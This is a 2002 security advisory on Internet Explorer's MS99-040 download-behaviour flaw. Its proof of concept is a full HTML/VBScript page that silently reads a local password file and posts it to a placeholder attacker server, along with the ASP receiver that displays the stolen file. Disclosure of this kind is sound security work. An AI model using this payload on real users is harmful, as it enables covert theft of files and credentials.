Microsoft posted a security bulletin on this (ms99-040) way back in September 28, 1999; it is still exploitable if the html file is run from the users local disk and not from a webserver or file-share.
8ffd9671f0b9be7cb6bdf03ca7f71dbd7b5e1f5919523c3959581dcf7e7832de
** Digit-Labs Security Advisory (http://www.digit-labs.org/) **
Advisory Name: MS99-040 Exploit
Release Date: 18.3.2002
Application: Tested on IE5.0 & IE 6
Platform: Tested on Windows NT/XP
Severity: Medium
Author(s): GoLLuM.no [mailto:gollum@digit-labs.org]
Vendor Status: Known since way back in September 28, 1999 (MS99-040)
Executive Summary:
Microsoft posted a security bullitin on this way back in September 28,
1999, it is still exploitable though if the html file is run from the
users local disk and not from a webserver or file-share.
Microsoft does not tell you how it actually works, but
since I am a nice person I will share it with you people... :-)
Detailed Description:
>From Internet Explorer 5 and onwards have several implemented
'Behaviours', one of these is the So-called "Download Behaviour" which
downloads a file and notifies a specified callback function when the
download is complete. I does however have a security glitch that allows
for download of files directly from the clients computer without
his/her knowledge, these file could very well be password files or any
other files that the client has access to. After the file is downloaded
it can be posted to a server without the users knowledge. The danger is
in someone mailing you an attached html-page that you open and then
steals some files from you. Before the V5 patch this exploit would work
from a Web-server too.
Proof-of-concept:
1.Create a file on your hardisk called c:\passwords.pwd
2.Place the text "ginger:eqweqw234qwe213:Ginger Lynn:::" in the new
file
3.Create a new html-file somewhere on you PC (not on a web-server or
fileshare) and call it download.htm
4.Place the following content in the html-file you just created:
<HTML XMLNS:IE>
<IE:DOWNLOAD ID="oDownload" STYLE="behavior:url(#default#download)" />
<SCRIPT LANGUAGE="vbscript">
Function onDownloadDone(s)
document.all.obj.value="a" & s
document.all.myform.submit()
End Function
</SCRIPT>
<body onload="vbscript:oDownload.startDownload
'file:///c:/passwords.pwd', GetRef('onDownloadDone')">
<form id="myform" action="http://www.yourserver.C0M/test.asp"
method="post">
<input type="hidden" value="oldval" id="obj" name="obj">
</form>
</body>
5.Create a file on a webserver to recive the stolen file called test.asp
and put the following in it if using ASP:
<html>
<head></head>
<body>
Stolen password file:
<br>
<%
response.write request.form("obj")
%>
</body>
</html>
6.Run the html-file to test the exploit.
See also:
http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/security/bulletin/ms99-040.asp